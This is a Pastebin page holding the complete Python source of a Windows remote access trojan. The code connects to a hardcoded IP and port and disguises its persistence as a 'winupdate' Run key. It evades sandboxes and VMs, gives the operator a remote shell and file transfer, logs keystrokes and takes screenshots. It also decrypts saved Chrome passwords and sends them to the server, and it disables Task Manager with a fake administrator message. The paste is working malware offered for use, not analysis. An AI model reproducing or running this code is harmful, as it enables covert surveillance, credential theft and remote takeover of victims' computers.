API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 28th, 2019
429
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.83 KB | None | 0 0
raw download clone embed print report
  1. import socket, os, sys, platform, time, ctypes, subprocess, webbrowser, sqlite3, pyscreeze, threading, pynput.keyboard, wmi
  2. import win32api, winerror, win32event, win32crypt
  3. from shutil import copyfile
  4. from winreg import *
  5.  
  6. strHost = "85.247.47.155"
  7. # strHost = socket.gethostbyname("")
  8. intPort = 1337
  9.  
  10. strPath = os.path.realpath(sys.argv[0]) # get file path
  11. TMP = os.environ["TEMP"] # get temp path
  12. APPDATA = os.environ["APPDATA"]
  13. intBuff = 1024
  14.  
  15.  
  16. # function to prevent multiple instances
  17. mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
  18. if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
  19. mutex = None
  20. sys.exit(0)
  21.  
  22.  
  23. def detectSandboxie():
  24. try:
  25. libHandle = ctypes.windll.LoadLibrary("SbieDll.dll")
  26.  
  27. return " (Sandboxie) "
  28. except: return ""
  29.  
  30.  
  31. def detectVM():
  32. objWMI = wmi.WMI()
  33. for objDiskDrive in objWMI.query("Select * from Win32_DiskDrive"):
  34. if "vbox" in objDiskDrive.Caption.lower() or "virtual" in objDiskDrive.Caption.lower():
  35. return " (Virtual Machine) "
  36. return ""
  37.  
  38.  
  39. def server_connect():
  40. global objSocket
  41. while True: # infinite loop until socket can connect
  42. try:
  43. objSocket = socket.socket()
  44. objSocket.connect((strHost, intPort))
  45. except socket.error:
  46. time.sleep(3600) # wait 5 seconds to try again
  47. else: break
  48.  
  49. strUserInfo = socket.gethostname() + "`," + platform.system() + " " + platform.release() + detectSandboxie() + detectVM() + \
  50. "`," + os.environ["USERNAME"]
  51. send(str.encode(strUserInfo))
  52.  
  53. # function to return decoded utf-8
  54. decode_utf8 = lambda data: data.decode("utf-8")
  55.  
  56. # function to receive and decrypt data
  57. recv = lambda buffer: objSocket.recv(buffer)
  58.  
  59. # function to send encrypted data
  60. send = lambda data: objSocket.send(data)
  61.  
  62. server_connect()
  63.  
  64. def OnKeyboardEvent(event):
  65. global strKeyLogs
  66.  
  67. try: # check to see if variable is defined
  68. strKeyLogs
  69. except NameError:
  70. strKeyLogs = ""
  71.  
  72. if event == Key.backspace:
  73. strKeyLogs += " [Bck] "
  74. elif event == Key.tab:
  75. strKeyLogs += " [Tab] "
  76. elif event == Key.enter:
  77. strKeyLogs += "\n"
  78. elif event == Key.space:
  79. strKeyLogs += " "
  80. elif type(event) == Key: # if the character is some other type of special key
  81. strKeyLogs += " [" + str(event)[4:] + "] "
  82. else:
  83. strKeyLogs += str(event)[1:len(str(event)) - 1] # remove quotes around character
  84.  
  85.  
  86. KeyListener = pynput.keyboard.Listener(on_press=OnKeyboardEvent)
  87. Key = pynput.keyboard.Key
  88.  
  89.  
  90. def recvall(buffer): # function to receive large amounts of data
  91. bytData = b""
  92. while True:
  93. bytPart = recv(buffer)
  94. if len(bytPart) == buffer:
  95. return bytPart
  96. bytData += bytPart
  97. if len(bytData) == buffer:
  98. return bytData
  99.  
  100.  
  101. # vbs message box
  102. def MessageBox(message):
  103. objVBS = open(TMP + "/m.vbs", "w")
  104. objVBS.write("Msgbox \"" + message + "\", vbOKOnly+vbInformation+vbSystemModal, \"Message\"")
  105. objVBS.close()
  106. subprocess.Popen(["cscript", TMP + "/m.vbs"], shell=True)
  107.  
  108.  
  109. def startup():
  110. try:
  111. strAppPath = APPDATA + "\\" + os.path.basename(strPath)
  112. copyfile(strPath, strAppPath)
  113.  
  114. objRegKey = OpenKey(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_ALL_ACCESS)
  115. SetValueEx(objRegKey, "winupdate", 0, REG_SZ, strAppPath); CloseKey(objRegKey)
  116. except WindowsError:
  117. send(str.encode("Unable to add to startup!"))
  118. else:
  119. send(str.encode("success"))
  120.  
  121.  
  122. def screenshot():
  123. pyscreeze.screenshot(TMP + "/s.png")
  124.  
  125. # send screenshot information to server
  126. send(str.encode("Receiving Screenshot" + "\n" + "File size: " + str(os.path.getsize(TMP + "/s.png"))
  127. + " bytes" + "\n" + "Please wait..."))
  128. objPic = open(TMP + "/s.png", "rb") # send file contents and close the file
  129. time.sleep(1)
  130. send(objPic.read())
  131. objPic.close()
  132.  
  133.  
  134. def file_browser():
  135. arrRawDrives = win32api.GetLogicalDriveStrings() # get list of drives
  136. arrRawDrives = arrRawDrives.split('\000')[:-1]
  137.  
  138. strDrives = ""
  139. for drive in arrRawDrives: # get proper view and place array into string
  140. strDrives += drive.replace("\\", "") + "\n"
  141. send(str.encode(strDrives))
  142.  
  143. strDir = decode_utf8(recv(intBuff))
  144.  
  145. if os.path.isdir(strDir):
  146. arrFiles = os.listdir(strDir)
  147.  
  148. strFiles = ""
  149. for file in arrFiles:
  150. strFiles += (file + "\n")
  151.  
  152. send(str.encode(str(len(strFiles)))) # send buffer size
  153. time.sleep(0.1)
  154. send(str.encode(strFiles))
  155.  
  156. else: # if the user entered an invalid directory
  157. send(str.encode("Invalid Directory!"))
  158. return
  159.  
  160.  
  161. def upload(data):
  162. intBuffer = int(data)
  163. file_data = recvall(intBuffer)
  164. strOutputFile = decode_utf8(recv(intBuff))
  165.  
  166. try:
  167. objFile = open(strOutputFile, "wb")
  168. objFile.write(file_data)
  169. objFile.close()
  170. send(str.encode("Done!!!"))
  171. except:
  172. send(str.encode("Path is protected/invalid!"))
  173.  
  174.  
  175. def receive(data):
  176. if not os.path.isfile(data):
  177. send(str.encode("Target file not found!"))
  178. return
  179.  
  180. send(str.encode("File size: " + str(os.path.getsize(data))
  181. + " bytes" + "\n" + "Please wait..."))
  182. objFile = open(data, "rb") # send file contents and close the file
  183. time.sleep(1)
  184. send(objFile.read())
  185. objFile.close()
  186.  
  187.  
  188. def lock():
  189. ctypes.windll.user32.LockWorkStation() # lock pc
  190.  
  191.  
  192. def shutdown(shutdowntype):
  193. command = "shutdown {0} -f -t 30".format(shutdowntype)
  194. subprocess.Popen(command.split(), shell=True)
  195. objSocket.close() # close connection and exit
  196. sys.exit(0)
  197.  
  198.  
  199. def command_shell():
  200. strCurrentDir = str(os.getcwd())
  201.  
  202. send(str.encode(strCurrentDir))
  203.  
  204. while True:
  205. strData = decode_utf8(recv(intBuff))
  206.  
  207. if strData == "goback":
  208. os.chdir(strCurrentDir) # change directory back to original
  209. break
  210.  
  211. elif strData[:2].lower() == "cd" or strData[:5].lower() == "chdir":
  212. objCommand = subprocess.Popen(strData + " & cd", stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
  213. if (objCommand.stderr.read()).decode("utf-8") == "": # if there is no error
  214. strOutput = (objCommand.stdout.read()).decode("utf-8").splitlines()[0] # decode and remove new line
  215. os.chdir(strOutput) # change directory
  216.  
  217. bytData = str.encode("\n" + str(os.getcwd()) + ">") # output to send the server
  218.  
  219. elif len(strData) > 0:
  220. objCommand = subprocess.Popen(strData, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
  221. strOutput = (objCommand.stdout.read() + objCommand.stderr.read()).decode("utf-8", errors="replace") # since cmd uses bytes, decode it
  222.  
  223. bytData = str.encode(strOutput + "\n" + str(os.getcwd()) + ">")
  224. else:
  225. bytData = str.encode("Error!!!")
  226.  
  227. strBuffer = str(len(bytData))
  228. send(str.encode(strBuffer)) # send buffer size
  229. time.sleep(0.1)
  230. send(bytData) # send output
  231.  
  232.  
  233. def vbs_block_process(process, popup, message, title, timeout, type):
  234. # VBScript to block process, this allows the script to disconnect from the original python process, check github rep for source
  235.  
  236. strVBSCode = "On Error Resume Next" + "\n" + \
  237. "Set objWshShl = WScript.CreateObject(\"WScript.Shell\")" + "\n" + \
  238. "Set objWMIService = GetObject(\"winmgmts:\" & \"{impersonationLevel=impersonate}!//./root/cimv2\")" + "\n" + \
  239. "Set colMonitoredProcesses = objWMIService.ExecNotificationQuery(\"select * " \
  240. "from __instancecreationevent \" & \" within 1 where TargetInstance isa 'Win32_Process'\")" + "\n" + \
  241. "Do" + "\n" + "Set objLatestProcess = colMonitoredProcesses.NextEvent" + "\n" + \
  242. "If LCase(objLatestProcess.TargetInstance.Name) = \"" + process + "\" Then" + "\n" + \
  243. "objLatestProcess.TargetInstance.Terminate" + "\n"
  244. if popup == "True": # if showing a message
  245. strVBSCode += "objWshShl.Popup \"" + message + "\"," + timeout + ", \"" + title + "\"," + type + "\n"
  246.  
  247. strVBSCode += "End If" + "\n" + "Loop"
  248.  
  249. objVBSFile = open(TMP + "/d.vbs", "w") # write the code and close the file
  250. objVBSFile.write(strVBSCode); objVBSFile.close()
  251.  
  252. subprocess.Popen(["cscript", TMP + "/d.vbs"], shell=True) # run the script
  253.  
  254.  
  255. def disable_taskmgr():
  256. global blnDisabled
  257. if blnDisabled == "False": # if task manager is already disabled, enable it
  258. send(str.encode("Enabling ..."))
  259.  
  260. subprocess.Popen(["taskkill", "/f", "/im", "cscript.exe"], shell=True)
  261.  
  262. blnDisabled = "True"
  263. else:
  264. send(str.encode("Disabling ..."))
  265.  
  266. vbs_block_process("taskmgr.exe", "True", "Task Manager has been disabled by your administrator",
  267. "Task Manager", "3", "16")
  268. blnDisabled = "False"
  269.  
  270.  
  271. def chrpass(): # legal purposes only!
  272. strPath = APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"
  273.  
  274. if not os.path.isfile(APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"):
  275. send(str.encode("noexist"))
  276. return
  277.  
  278. conn = sqlite3.connect(strPath) # connect to database
  279. objCursor = conn.cursor()
  280.  
  281. try:
  282. objCursor.execute("Select action_url, username_value, password_value FROM logins") # look for credentials
  283. except: # if the chrome is open
  284. send(str.encode("error"))
  285. strServerResponse = decode_utf8(recv(intBuff))
  286.  
  287. if strServerResponse == "close": # if the user wants to close the browser
  288. subprocess.Popen(["taskkill", "/f", "/im", "chrome.exe"], shell=True)
  289. return
  290.  
  291. strResults = "Chrome Saved Passwords:" + "\n"
  292.  
  293. for result in objCursor.fetchall(): # get data as raw text from sql db
  294. password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
  295. if password:
  296. strResults += "Site: " + result[0] + "\n" + "Username: " + result[1] + "\n" + "Password: " \
  297. + decode_utf8(password)
  298.  
  299. strBuffer = str(len(strResults))
  300. send(str.encode(strBuffer)) # send buffer
  301. time.sleep(0.2)
  302. send(str.encode(strResults))
  303.  
  304.  
  305. def keylogger(option):
  306. global strKeyLogs
  307.  
  308. if option == "start":
  309. if not KeyListener.running:
  310. KeyListener.start()
  311. send(str.encode("success"))
  312. else:
  313. send(str.encode("error"))
  314.  
  315. elif option == "stop":
  316. if KeyListener.running:
  317. KeyListener.stop()
  318. threading.Thread.__init__(KeyListener) # re-initialise the thread
  319. strKeyLogs = ""
  320. send(str.encode("success"))
  321. else:
  322. send(str.encode("error"))
  323.  
  324. elif option == "dump":
  325. if not KeyListener.running:
  326. send(str.encode("error"))
  327. else:
  328. if strKeyLogs == "":
  329. send(str.encode("error2"))
  330. else:
  331. time.sleep(0.2)
  332. send(str.encode(str(len(strKeyLogs)))) # send buffer size
  333. time.sleep(0.2)
  334. send(str.encode(strKeyLogs)) # send logs
  335.  
  336. strKeyLogs = "" # clear logs
  337.  
  338.  
  339. def run_command(command):
  340. strLogOutput = "\n"
  341.  
  342. if len(command) > 0:
  343. objCommand = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
  344. strLogOutput += (objCommand.stdout.read() + objCommand.stderr.read()).decode("utf-8", errors="ignore")
  345. else:
  346. strLogOutput += "Error!!!"
  347.  
  348. bytData = str.encode(strLogOutput)
  349.  
  350. strBuffer = str(len(bytData))
  351. send(str.encode(strBuffer)) # send buffer size
  352. time.sleep(0.1)
  353. send(bytData) # send output
  354.  
  355.  
  356. while True:
  357. try:
  358. while True:
  359. strData = recv(intBuff)
  360. strData = decode_utf8(strData)
  361.  
  362. if strData == "exit":
  363. objSocket.close()
  364. sys.exit(0)
  365. elif strData[:3] == "msg":
  366. MessageBox(strData[3:])
  367. elif strData[:4] == "site":
  368. webbrowser.get().open(strData[4:])
  369. elif strData == "startup":
  370. startup()
  371. elif strData == "screen":
  372. screenshot()
  373. elif strData == "filebrowser":
  374. file_browser()
  375. elif strData[:4] == "send":
  376. upload(strData[4:])
  377. elif strData[:4] == "recv":
  378. receive(strData[4:])
  379. elif strData == "lock":
  380. lock()
  381. elif strData == "shutdown":
  382. shutdown("-s")
  383. elif strData == "restart":
  384. shutdown("-r")
  385. elif strData == "test":
  386. continue
  387. elif strData == "cmd":
  388. command_shell()
  389. elif strData == "chrpass":
  390. chrpass()
  391. elif strData == "keystart":
  392. keylogger("start")
  393. elif strData == "keystop":
  394. keylogger("stop")
  395. elif strData == "keydump":
  396. keylogger("dump")
  397. elif strData[:6] == "runcmd":
  398. run_command(strData[6:])
  399. elif strData == "dtaskmgr":
  400. if not "blnDisabled" in globals(): # if the variable doesnt exist yet
  401. blnDisabled = "True"
  402. disable_taskmgr()
  403. except socket.error: # if the server closes without warning
  404. objSocket.close()
  405. del objSocket
  406. server_connect()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!